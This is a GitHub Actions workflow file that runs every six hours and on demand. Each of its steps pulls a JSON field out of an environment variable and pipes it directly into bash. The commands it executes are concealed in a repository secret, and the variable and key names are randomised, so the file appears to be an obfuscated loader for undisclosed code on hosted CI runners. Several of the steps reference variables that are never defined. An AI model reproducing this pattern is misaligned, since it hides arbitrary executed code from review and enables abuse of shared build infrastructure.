name: duanzhixing2016

on:
  workflow_dispatch:
  schedule:
    - cron: '10 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: duanzhixing2016
        env:
          r6: ${{ secrets.r6 }}
        run: |
          echo $r6 | jq -r .y33920 | /bin/bash
          echo $uf92 | jq -r .vjg35 | /bin/bash
          echo $bk638 | jq -r .dqug496 | /bin/bash
          echo $n834 | jq -r .he7 | /bin/bash
          echo $fsfy3520 | jq -r .en669 | /bin/bash
          echo $wtvwl6 | jq -r .z5 | /bin/bash
          echo $y3 | jq -r .ad04309 | /bin/bash
          echo $p54562 | jq -r .sq23824 | /bin/bash

